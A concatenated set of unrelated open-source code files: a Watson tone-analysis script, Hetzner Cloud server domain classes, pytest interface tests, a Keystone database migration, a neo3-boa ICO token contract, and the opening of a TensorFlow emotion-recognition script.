src/tone.py | devanshslnk/HelpOff | 2 | 6812 | from __future__ import print_function
import json
from os.path import join, dirname
from watson_developer_cloud import ToneAnalyzerV3
from watson_developer_cloud.tone_analyzer_v3 import ToneInput
from pprint import pprint
# If service instance provides API key authentication
# service = ToneAnalyzerV3(
# ## url is optional, and defaults to the URL below. Use the correct URL for your region.
# url='https://gateway.watsonplatform.net/tone-analyzer/api',
# version='2017-09-21',
# iam_apikey='your_apikey')
service = ToneAnalyzerV3(
## url is optional, and defaults to the URL below. Use the correct URL for your region.
# url='https://gateway.watsonplatform.net/tone-analyzer/api',
username='f0ec47cc-5191-4421-8fca-<PASSWORD>917e1<PASSWORD>',
password='<PASSWORD>',
version='2017-09-21')
# print("\ntone_chat() example 1:\n")
# utterances = [{
# 'text': 'I am very happy.',
# 'user': 'glenn'
# }, {
# 'text': 'It is a good day.',
# 'user': 'glenn'
# }]
# tone_chat = service.tone_chat(utterances).get_result()
# print(json.dumps(tone_chat, indent=2))
# print("\ntone() example 1:\n")
# print(
# json.dumps(
# service.tone(
# tone_input='I am very happy. It is a good day.',
# content_type="text/plain").get_result(),
# indent=2))
# print("\ntone() example 2:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example.json')) as tone_json:
# tone = service.tone(json.load(tone_json)['text'], "text/plain").get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 3:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example.json')) as tone_json:
# tone = service.tone(
# tone_input=json.load(tone_json)['text'],
# content_type='text/plain',
# sentences=True).get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 4:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example.json')) as tone_json:
# tone = service.tone(
# tone_input=json.load(tone_json),
# content_type='application/json').get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 5:\n")
# with open(join(dirname(__file__),
# '../resources/tone-example-html.json')) as tone_html:
# tone = service.tone(
# json.load(tone_html)['text'], content_type='text/html').get_result()
# print(json.dumps(tone, indent=2))
# print("\ntone() example 6 with GDPR support:\n")
# service.set_detailed_response(True)
# with open(join(dirname(__file__),
# '../resources/tone-example-html.json')) as tone_html:
# tone = service.tone(
# json.load(tone_html)['text'],
# content_type='text/html',
# headers={
# 'Custom-Header': 'custom_value'
# })
# print(tone)
# print(tone.get_headers())
# print(tone.get_result())
# print(tone.get_status_code())
# service.set_detailed_response(False)
# print("\ntone() example 7:\n")
test_tone="Hi Team, The times are difficult! Our sales have been disappointing for the past three quarters for our data analytics product suite. We have a competitive data analytics product suite in the industry. However, we are not doing a good job at selling it, and this is really frustrating.We are missing critical sales opportunities. We cannot blame the economy for our lack of execution. Our clients need analytical tools to change their current business outcomes. In fact, it is in times such as this, our clients want to get the insights they need to turn their businesses around. It is disheartening to see that we are failing at closing deals, in such a hungry market. Let's buckle up and execute.<NAME>akerSales Leader, North-East region"
tone_input = ToneInput(test_tone)
result = service.tone(tone_input=tone_input, content_type="application/json").get_result()
# print(type(json.dumps(tone, indent=2)))
pprint(result) | 2.15625 | 2 |
hcloud/servers/domain.py | usmannasir/hcloud-python | 1 | 6813 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from hcloud.core.domain import BaseDomain
from hcloud.helpers.descriptors import ISODateTime
class Server(BaseDomain):
"""Server Domain
:param id: int
ID of the server
:param name: str
Name of the server (must be unique per project and a valid hostname as per RFC 1123)
:param status: str
Status of the server Choices: `running`, `initializing`, `starting`, `stopping`, `off`, `deleting`, `migrating`, `rebuilding`, `unknown`
:param created: datetime
Point in time when the server was created
:param public_net: :class:`PublicNetwork <hcloud.servers.domain.PublicNetwork>`
Public network information.
:param server_type: :class:`BoundServerType <hcloud.server_types.client.BoundServerType>`
:param datacenter: :class:`BoundDatacenter <hcloud.datacenters.client.BoundDatacenter>`
:param image: :class:`BoundImage <hcloud.images.client.BoundImage>`, None
:param iso: :class:`BoundIso <hcloud.isos.client.BoundIso>`, None
:param rescue_enabled: bool
True if rescue mode is enabled: Server will then boot into rescue system on next reboot.
:param locked: bool
True if server has been locked and is not available to user.
:param backup_window: str, None
Time window (UTC) in which the backup will run, or None if the backups are not enabled
:param outgoing_traffic: int, None
Outbound Traffic for the current billing period in bytes
:param ingoing_traffic: int, None
Inbound Traffic for the current billing period in bytes
:param included_traffic: int
Free Traffic for the current billing period in bytes
:param protection: dict
Protection configuration for the server
:param labels: dict
User-defined labels (key-value pairs)
:param volumes: List[:class:`BoundVolume <hcloud.volumes.client.BoundVolume>`]
Volumes assigned to this server.
"""
STATUS_RUNNING = "running"
"""Server Status running"""
STATUS_INIT = "initializing"
"""Server Status initializing"""
STATUS_STARTING = "starting"
"""Server Status starting"""
STATUS_STOPPING = "stopping"
"""Server Status stopping"""
STATUS_OFF = "off"
"""Server Status off"""
STATUS_DELETING = "deleting"
"""Server Status deleting"""
STATUS_MIGRATING = "migrating"
"""Server Status migrating"""
STATUS_REBUILDING = "rebuilding"
"""Server Status rebuilding"""
STATUS_UNKNOWN = "unknown"
"""Server Status unknown"""
__slots__ = (
"id",
"name",
"status",
"public_net",
"server_type",
"datacenter",
"image",
"iso",
"rescue_enabled",
"locked",
"backup_window",
"outgoing_traffic",
"ingoing_traffic",
"included_traffic",
"protection",
"labels",
"volumes",
)
created = ISODateTime()
supported_fields = ("created",)
def __init__(
self,
id,
name=None,
status=None,
created=None,
public_net=None,
server_type=None,
datacenter=None,
image=None,
iso=None,
rescue_enabled=None,
locked=None,
backup_window=None,
outgoing_traffic=None,
ingoing_traffic=None,
included_traffic=None,
protection=None,
labels=None,
volumes=None,
):
self.id = id
self.name = name
self.status = status
self.created = created
self.public_net = public_net
self.server_type = server_type
self.datacenter = datacenter
self.image = image
self.iso = iso
self.rescue_enabled = rescue_enabled
self.locked = locked
self.backup_window = backup_window
self.outgoing_traffic = outgoing_traffic
self.ingoing_traffic = ingoing_traffic
self.included_traffic = included_traffic
self.protection = protection
self.labels = labels
self.volumes = volumes
class CreateServerResponse(BaseDomain):
"""Create Server Response Domain
    :param server: :class:`BoundServer <hcloud.servers.client.BoundServer>`
The created server
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server creation
:param next_actions: List[:class:`BoundAction <hcloud.actions.client.BoundAction>`]
Additional actions like a `start_server` action after the server creation
:param root_password: str, None
The root password of the server if no SSH-Key was given on server creation
"""
__slots__ = (
"server",
"action",
"next_actions",
"root_password"
)
def __init__(
self,
server, # type: BoundServer
action, # type: BoundAction
next_actions, # type: List[Action]
root_password # type: str
):
self.server = server
self.action = action
self.next_actions = next_actions
        self.root_password = root_password
class ResetPasswordResponse(BaseDomain):
"""Reset Password Response Domain
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server passwort reset action
:param root_password: str
The root password of the server
"""
__slots__ = (
"action",
"root_password"
)
def __init__(
self,
action, # type: BoundAction
root_password # type: str
):
self.action = action
self.root_password = root_password
class EnableRescueResponse(BaseDomain):
"""Enable Rescue Response Domain
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server enable rescue action
:param root_password: str
The root password of the server in the rescue mode
"""
__slots__ = (
"action",
"root_password"
)
def __init__(
self,
action, # type: BoundAction
root_password # type: str
):
self.action = action
        self.root_password = root_password
class RequestConsoleResponse(BaseDomain):
"""Request Console Response Domain
:param action: :class:`BoundAction <hcloud.actions.client.BoundAction>`
Shows the progress of the server request console action
:param wss_url: str
URL of websocket proxy to use. This includes a token which is valid for a limited time only.
:param password: str
VNC password to use for this connection. This password only works in combination with a wss_url with valid token.
"""
__slots__ = (
"action",
"wss_url",
"password"
)
def __init__(
self,
action, # type: BoundAction
wss_url, # type: str
password, # type: str
):
self.action = action
self.wss_url = wss_url
self.password = password
class PublicNetwork(BaseDomain):
"""Public Network Domain
:param ipv4: :class:`IPv4Address <hcloud.servers.domain.IPv4Address>`
:param ipv6: :class:`IPv6Network <hcloud.servers.domain.IPv6Network>`
:param floating_ips: List[:class:`BoundFloatingIP <hcloud.floating_ips.client.BoundFloatingIP>`]
"""
__slots__ = (
"ipv4",
"ipv6",
"floating_ips"
)
def __init__(self,
ipv4, # type: IPv4Address
ipv6, # type: IPv6Network
floating_ips, # type: List[BoundFloatingIP]
):
self.ipv4 = ipv4
self.ipv6 = ipv6
self.floating_ips = floating_ips
class IPv4Address(BaseDomain):
"""IPv4 Address Domain
:param ip: str
The IPv4 Address
:param blocked: bool
Determine if the IP is blocked
:param dns_ptr: str
DNS PTR for the ip
"""
__slots__ = (
"ip",
"blocked",
"dns_ptr"
)
def __init__(self,
ip, # type: str
blocked, # type: bool
dns_ptr, # type: str
):
self.ip = ip
self.blocked = blocked
self.dns_ptr = dns_ptr
class IPv6Network(BaseDomain):
"""IPv6 Network Domain
:param ip: str
The IPv6 Network as CIDR Notation
:param blocked: bool
Determine if the Network is blocked
:param dns_ptr: dict
DNS PTR Records for the Network as Dict
:param network: str
The network without the network mask
:param network_mask: str
The network mask
"""
__slots__ = (
"ip",
"blocked",
"dns_ptr",
"network",
"network_mask"
)
def __init__(self,
ip, # type: str
blocked, # type: bool
dns_ptr, # type: list
):
self.ip = ip
self.blocked = blocked
self.dns_ptr = dns_ptr
ip_parts = self.ip.split("/") # 2001:db8::/64 to 2001:db8:: and 64
self.network = ip_parts[0]
self.network_mask = ip_parts[1]
| 2.234375 | 2 |
AutomationFramework/tests/interfaces/test_if_subif.py | sbarguil/Testing-framework | 1 | 6814 | <reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py
import pytest
from AutomationFramework.page_objects.interfaces.interfaces import Interfaces
from AutomationFramework.tests.base_test import BaseTest
class TestInterfacesSubInterfaces(BaseTest):
test_case_file = 'if_subif.yml'
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_description',
'page_object_class': Interfaces}])
def test_if_subif_description(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_enabled',
'page_object_class': Interfaces}])
def test_if_subif_enabled(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_prefix_length',
'page_object_class': Interfaces}])
def test_if_subif_ip_prefix_length(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_state',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_ip_state(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_origin',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_origin(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_dhcp_client',
'page_object_class': Interfaces}])
def test_if_subif_dhcp_client(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_mtu',
'page_object_class': Interfaces}])
def test_if_subif_mtu(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_inner_outer_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_inner_outer_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_match_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_match_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
| 2.234375 | 2 |
keystone/common/sql/migrate_repo/versions/001_add_initial_tables.py | sanket4373/keystone | 0 | 6815 | <reponame>sanket4373/keystone
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
# catalog
service_table = sql.Table(
'service',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('type', sql.String(255)),
sql.Column('extra', sql.Text()))
service_table.create(migrate_engine, checkfirst=True)
endpoint_table = sql.Table(
'endpoint',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('region', sql.String(255)),
sql.Column('service_id',
sql.String(64),
sql.ForeignKey('service.id'),
nullable=False),
sql.Column('extra', sql.Text()))
endpoint_table.create(migrate_engine, checkfirst=True)
# identity
role_table = sql.Table(
'role',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(255), unique=True, nullable=False))
role_table.create(migrate_engine, checkfirst=True)
if migrate_engine.name == 'ibm_db_sa':
# NOTE(blk-u): SQLAlchemy for PostgreSQL picks the name tenant_name_key
# for the unique constraint, but for DB2 doesn't give the UC a name
# unless we tell it to and there is no DDL to alter a column to drop
# an unnamed unique constraint, so this code creates a named unique
# constraint on the name column rather than an unnamed one.
# (This is used in migration 16.)
tenant_table = sql.Table(
'tenant',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.UniqueConstraint('name', name='tenant_name_key'))
else:
tenant_table = sql.Table(
'tenant',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()))
tenant_table.create(migrate_engine, checkfirst=True)
metadata_table = sql.Table(
'metadata',
meta,
sql.Column('user_id', sql.String(64), primary_key=True),
sql.Column('tenant_id', sql.String(64), primary_key=True),
sql.Column('data', sql.Text()))
metadata_table.create(migrate_engine, checkfirst=True)
ec2_credential_table = sql.Table(
'ec2_credential',
meta,
sql.Column('access', sql.String(64), primary_key=True),
sql.Column('secret', sql.String(64)),
sql.Column('user_id', sql.String(64)),
sql.Column('tenant_id', sql.String(64)))
ec2_credential_table.create(migrate_engine, checkfirst=True)
if migrate_engine.name == 'ibm_db_sa':
# NOTE(blk-u): SQLAlchemy for PostgreSQL picks the name user_name_key
# for the unique constraint, but for DB2 doesn't give the UC a name
# unless we tell it to and there is no DDL to alter a column to drop
# an unnamed unique constraint, so this code creates a named unique
# constraint on the name column rather than an unnamed one.
# (This is used in migration 16.)
user_table = sql.Table(
'user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.UniqueConstraint('name', name='user_name_key'))
else:
user_table = sql.Table(
'user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()))
user_table.create(migrate_engine, checkfirst=True)
user_tenant_membership_table = sql.Table(
'user_tenant_membership',
meta,
sql.Column(
'user_id',
sql.String(64),
sql.ForeignKey('user.id'),
primary_key=True),
sql.Column(
'tenant_id',
sql.String(64),
sql.ForeignKey('tenant.id'),
primary_key=True))
user_tenant_membership_table.create(migrate_engine, checkfirst=True)
# token
token_table = sql.Table(
'token',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('expires', sql.DateTime()),
sql.Column('extra', sql.Text()))
token_table.create(migrate_engine, checkfirst=True)
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = sql.MetaData()
meta.bind = migrate_engine
tables = ['user_tenant_membership', 'token', 'user', 'tenant', 'role',
'metadata', 'ec2_credential', 'endpoint', 'service']
for t in tables:
table = sql.Table(t, meta, autoload=True)
table.drop(migrate_engine, checkfirst=True)
| 1.710938 | 2 |
boa3_test/examples/ico.py | DanPopa46/neo3-boa | 0 | 6816 | <gh_stars>0
from typing import Any, List, Union
from boa3.builtin import NeoMetadata, metadata, public
from boa3.builtin.contract import Nep17TransferEvent
from boa3.builtin.interop.blockchain import get_contract
from boa3.builtin.interop.contract import GAS, NEO, call_contract
from boa3.builtin.interop.runtime import calling_script_hash, check_witness
from boa3.builtin.interop.storage import delete, get, put
from boa3.builtin.type import UInt160
# -------------------------------------------
# METADATA
# -------------------------------------------
@metadata
def manifest_metadata() -> NeoMetadata:
"""
Defines this smart contract's metadata information
"""
meta = NeoMetadata()
meta.author = "<NAME>, <NAME> and <NAME>. COZ in partnership with Simpli"
meta.description = "ICO Example"
meta.email = "<EMAIL>"
return meta
# -------------------------------------------
# Storage Key Prefixes
# -------------------------------------------
KYC_WHITELIST_PREFIX = b'KYCWhitelistApproved'
TOKEN_TOTAL_SUPPLY_PREFIX = b'TokenTotalSupply'
TRANSFER_ALLOWANCE_PREFIX = b'TransferAllowancePrefix_'
# -------------------------------------------
# TOKEN SETTINGS
# -------------------------------------------
# Script hash of the contract owner
TOKEN_OWNER = UInt160()
# Symbol of the Token
TOKEN_SYMBOL = 'ICO'
# Number of decimal places
TOKEN_DECIMALS = 8
# Initial Supply of tokens in the system
TOKEN_INITIAL_SUPPLY = 10_000_000 * 100_000_000 # 10m total supply * 10^8 (decimals)
# -------------------------------------------
# Events
# -------------------------------------------
on_transfer = Nep17TransferEvent
# -------------------------------------------
# Methods
# -------------------------------------------
@public
def verify() -> bool:
"""
When this contract address is included in the transaction signature,
this method will be triggered as a VerificationTrigger to verify that the signature is correct.
For example, this method needs to be called when withdrawing token from the contract.
:return: whether the transaction signature is correct
"""
return is_administrator()
def is_administrator() -> bool:
"""
Validates if the invoker has administrative rights
:return: whether the contract's invoker is an administrator
"""
return check_witness(TOKEN_OWNER)
def is_valid_address(address: UInt160) -> bool:
"""
    Validates whether the given address has passed the KYC process.
:return: whether the given address is validated by kyc
"""
return get(KYC_WHITELIST_PREFIX + address).to_int() > 0
@public
def deploy() -> bool:
"""
Initializes the storage when the smart contract is deployed.
:return: whether the deploy was successful. This method must return True only during the smart contract's deploy.
"""
if not check_witness(TOKEN_OWNER):
return False
if get(TOKEN_TOTAL_SUPPLY_PREFIX).to_int() > 0:
return False
put(TOKEN_TOTAL_SUPPLY_PREFIX, TOKEN_INITIAL_SUPPLY)
put(TOKEN_OWNER, TOKEN_INITIAL_SUPPLY)
on_transfer(None, TOKEN_OWNER, TOKEN_INITIAL_SUPPLY)
return True
@public
def mint(amount: int) -> bool:
"""
Mints new tokens
    :param amount: the amount of tokens to be minted
    :type amount: int
    :return: whether the minting was successful
"""
assert amount >= 0
if not is_administrator():
return False
if amount > 0:
current_total_supply = totalSupply()
owner_balance = balanceOf(TOKEN_OWNER)
put(TOKEN_TOTAL_SUPPLY_PREFIX, current_total_supply + amount)
put(TOKEN_OWNER, owner_balance + amount)
on_transfer(None, TOKEN_OWNER, amount)
post_transfer(None, TOKEN_OWNER, amount, None)
return True
@public
def refund(address: UInt160, neo_amount: int, gas_amount: int) -> bool:
"""
Refunds an address with given Neo and Gas
:param address: the address that have the tokens
:type address: UInt160
:param neo_amount: the amount of neo to be refunded
:type neo_amount: int
:param gas_amount: the amount of gas to be refunded
:type gas_amount: int
:return: whether the refund was successful
"""
assert len(address) == 20
assert neo_amount > 0 or gas_amount > 0
if not is_administrator():
return False
if neo_amount > 0:
result = call_contract(NEO, 'transfer', [calling_script_hash, address, neo_amount, None])
if result != True:
# due to a current limitation in the neo3-boa, changing the condition to `not result`
# will result in a compiler error
return False
if gas_amount > 0:
result = call_contract(GAS, 'transfer', [calling_script_hash, address, gas_amount, None])
if result != True:
# due to a current limitation in the neo3-boa, changing the condition to `not result`
# will result in a compiler error
return False
return True
# -------------------------------------------
# Public methods from NEP5.1
# -------------------------------------------
@public
def symbol() -> str:
"""
Gets the symbols of the token.
This symbol should be short (3-8 characters is recommended), with no whitespace characters or new-lines and should
be limited to the uppercase latin alphabet (i.e. the 26 letters used in English).
This method must always return the same value every time it is invoked.
:return: a short string symbol of the token managed in this contract.
"""
return TOKEN_SYMBOL
@public
def decimals() -> int:
"""
Gets the amount of decimals used by the token.
E.g. 8, means to divide the token amount by 100,000,000 (10 ^ 8) to get its user representation.
This method must always return the same value every time it is invoked.
:return: the number of decimals used by the token.
"""
return TOKEN_DECIMALS
@public
def totalSupply() -> int:
"""
Gets the total token supply deployed in the system.
This number mustn't be in its user representation. E.g. if the total supply is 10,000,000 tokens, this method
must return 10,000,000 * 10 ^ decimals.
:return: the total token supply deployed in the system.
"""
return get(TOKEN_TOTAL_SUPPLY_PREFIX).to_int()
@public
def balanceOf(account: UInt160) -> int:
"""
Get the current balance of an address
The parameter account should be a 20-byte address.
:param account: the account address to retrieve the balance for
:type account: UInt160
:return: the token balance of the `account`
:raise AssertionError: raised if `account` length is not 20.
"""
assert len(account) == 20
return get(account).to_int()
@public
def transfer(from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
"""
Transfers a specified amount of NEP17 tokens from one account to another
If the method succeeds, it must fire the `transfer` event and must return true, even if the amount is 0,
or from and to are the same address.
:param from_address: the address to transfer from
:type from_address: UInt160
:param to_address: the address to transfer to
:type to_address: UInt160
:param amount: the amount of NEP17 tokens to transfer
:type amount: int
:param data: whatever data is pertinent to the onPayment method
:type data: Any
:return: whether the transfer was successful
    :raise AssertionError: raised if `from_address` or `to_address` length is not 20 or if `amount` is less than zero.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(from_address) == 20 and len(to_address) == 20
# the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
assert amount >= 0
# The function MUST return false if the from account balance does not have enough tokens to spend.
from_balance = get(from_address).to_int()
if from_balance < amount:
return False
# The function should check whether the from address equals the caller contract hash.
# If so, the transfer should be processed;
# If not, the function should use the check_witness to verify the transfer.
if from_address != calling_script_hash:
if not check_witness(from_address):
return False
# skip balance changes if transferring to yourself or transferring 0 cryptocurrency
if from_address != to_address and amount != 0:
if from_balance == amount:
delete(from_address)
else:
put(from_address, from_balance - amount)
to_balance = get(to_address).to_int()
put(to_address, to_balance + amount)
# if the method succeeds, it must fire the transfer event
on_transfer(from_address, to_address, amount)
# if the to_address is a smart contract, it must call the contracts onPayment
post_transfer(from_address, to_address, amount, data)
# and then it must return true
return True
def post_transfer(from_address: Union[UInt160, None], to_address: Union[UInt160, None], amount: int, data: Any):
"""
Checks if the one receiving NEP17 tokens is a smart contract and if it's one the onPayment method will be called
:param from_address: the address of the sender
:type from_address: UInt160
:param to_address: the address of the receiver
:type to_address: UInt160
:param amount: the amount of cryptocurrency that is being sent
:type amount: int
:param data: any pertinent data that might validate the transaction
:type data: Any
"""
if not isinstance(to_address, None): # TODO: change to 'is not None' when `is` semantic is implemented
contract = get_contract(to_address)
if not isinstance(contract, None): # TODO: change to 'is not None' when `is` semantic is implemented
call_contract(to_address, 'onPayment', [from_address, amount, data])
@public
def allowance(from_address: UInt160, to_address: UInt160) -> int:
"""
Returns the amount of tokens that the to account can transfer from the from account.
    :param from_address: the address that has the tokens
:type from_address: UInt160
:param to_address: the address that is authorized to use the tokens
:type to_address: UInt160
:return: the amount of tokens that the `to` account can transfer from the `from` account
:raise AssertionError: raised if `from_address` or `to_address` length is not 20.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(from_address) == 20 and len(to_address) == 20
return get(TRANSFER_ALLOWANCE_PREFIX + from_address + to_address).to_int()
@public
def transferFrom(originator: UInt160, from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
"""
Transfers an amount from the `from` account to the `to` account if the `originator` has been approved to transfer
the requested amount.
:param originator: the address where the actual token is
:type originator: UInt160
:param from_address: the address to transfer from with originator's approval
:type from_address: UInt160
:param to_address: the address to transfer to
:type to_address: UInt160
:param amount: the amount of NEP17 tokens to transfer
:type amount: int
:param data: any pertinent data that might validate the transaction
:type data: Any
:return: whether the transfer was successful
    :raise AssertionError: raised if `from_address` or `to_address` length is not 20 or if `amount` is less than zero.
"""
# the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
assert len(originator) == 20 and len(from_address) == 20 and len(to_address) == 20
# the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
assert amount >= 0
# The function should check whether the from address equals the caller contract hash.
# If so, the transfer should be processed;
# If not, the function should use the check_witness to verify the transfer.
if from_address != calling_script_hash:
if not check_witness(from_address):
return False
approved_transfer_amount = allowance(originator, from_address)
if approved_transfer_amount < amount:
return False
originator_balance = balanceOf(originator)
if originator_balance < amount:
return False
# update allowance between originator and from
if approved_transfer_amount == amount:
delete(TRANSFER_ALLOWANCE_PREFIX + originator + from_address)
else:
put(TRANSFER_ALLOWANCE_PREFIX + originator + from_address, approved_transfer_amount - amount)
# skip balance changes if transferring to yourself or transferring 0 cryptocurrency
if amount != 0 and from_address != to_address:
# update originator's balance
if originator_balance == amount:
delete(originator)
else:
put(originator, originator_balance - amount)
# updates to's balance
to_balance = get(to_address).to_int()
put(to_address, to_balance + amount)
# if the method succeeds, it must fire the transfer event
on_transfer(from_address, to_address, amount)
# if the to_address is a smart contract, it must call the contracts onPayment
post_transfer(from_address, to_address, amount, data)
# and then it must return true
return True
@public
def approve(originator: UInt160, to_address: UInt160, amount: int) -> bool:
"""
Approves the to account to transfer amount tokens from the originator account.
    :param originator: the address that has the tokens
:type originator: UInt160
:param to_address: the address that is authorized to use the tokens
:type to_address: UInt160
:param amount: the amount of NEP17 tokens to transfer
:type amount: int
:return: whether the approval was successful
    :raise AssertionError: raised if `originator` or `to_address` length is not 20 or if `amount` is less than zero.
"""
assert len(originator) == 20 and len(to_address) == 20
assert amount >= 0
if not check_witness(originator):
return False
if originator == to_address:
return False
if not is_valid_address(originator) or not is_valid_address(to_address):
        # one of the addresses hasn't passed the KYC yet
return False
if balanceOf(originator) < amount:
return False
put(TRANSFER_ALLOWANCE_PREFIX + originator + to_address, amount)
return True
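# Illustrative allowance flow (comments only, not contract logic): a holder
# first invokes approve(holder, spender, amount); allowance(holder, spender)
# then reports the remaining approved amount, and the spender can move tokens
# with transferFrom(holder, spender, recipient, amount, None), which deducts
# the transferred amount from that allowance. `holder`, `spender` and
# `recipient` stand in for hypothetical 20-byte UInt160 addresses.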
# -------------------------------------------
# Public methods from KYC
# -------------------------------------------
@public
def kyc_register(addresses: List[UInt160]) -> int:
"""
Includes the given addresses to the kyc whitelist
:param addresses: a list with the addresses to be included
:return: the number of included addresses
"""
included_addresses = 0
if is_administrator():
for address in addresses:
if len(address) == 20:
kyc_key = KYC_WHITELIST_PREFIX + address
put(kyc_key, True)
included_addresses += 1
return included_addresses
@public
def kyc_remove(addresses: List[UInt160]) -> int:
"""
Removes the given addresses from the kyc whitelist
:param addresses: a list with the addresses to be removed
:return: the number of removed addresses
"""
removed_addresses = 0
if is_administrator():
for address in addresses:
if len(address) == 20:
kyc_key = KYC_WHITELIST_PREFIX + address
delete(kyc_key)
removed_addresses += 1
return removed_addresses
| 1.570313 | 2 |
emotion_recognition.py | Partaourides/SERN | 10 | 6817 | import os
# Restrict the script to run on CPU
os.environ ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = ""
# Import Keras Tensorflow Backend
# from keras import backend as K
import tensorflow as tf
# Configure it to use only specific CPU Cores
config = tf.ConfigProto(intra_op_parallelism_threads=4,
inter_op_parallelism_threads=4,
device_count={"CPU": 1, "GPU": 0},
allow_soft_placement=True)
# import tensorflow as tf
import numpy as np
from IEOMAP_dataset_AC import dataset, IeomapSentenceIterator
from sklearn.metrics import confusion_matrix
from models_AC import SentenceModel
import json
import os
def emotion_recognition(n_run, epochs, batch_size, embedding_size, first_rnn_size, dropout, embedding, num_speakers):
########################################################################################################################
# Hyper-parameters
########################################################################################################################
split_size = 0.8 # Split proportion of train and test data
#log_dir = './logs_AC/RNN_without_ID/1'
log_dir = './logs_AC/RNN_' \
+ str(num_speakers) + '/' + str(n_run) + '/'
#log_dir = './logs_AC/RNN_' + embedding + 'Emb' + str(embedding_size) + '_1layer' + str(2*first_rnn_size) + '/' + str(n_run)
train_log_dir = log_dir + 'train'
val_log_dir = log_dir + 'val'
########################################################################################################################
# Initialize the Data set
########################################################################################################################
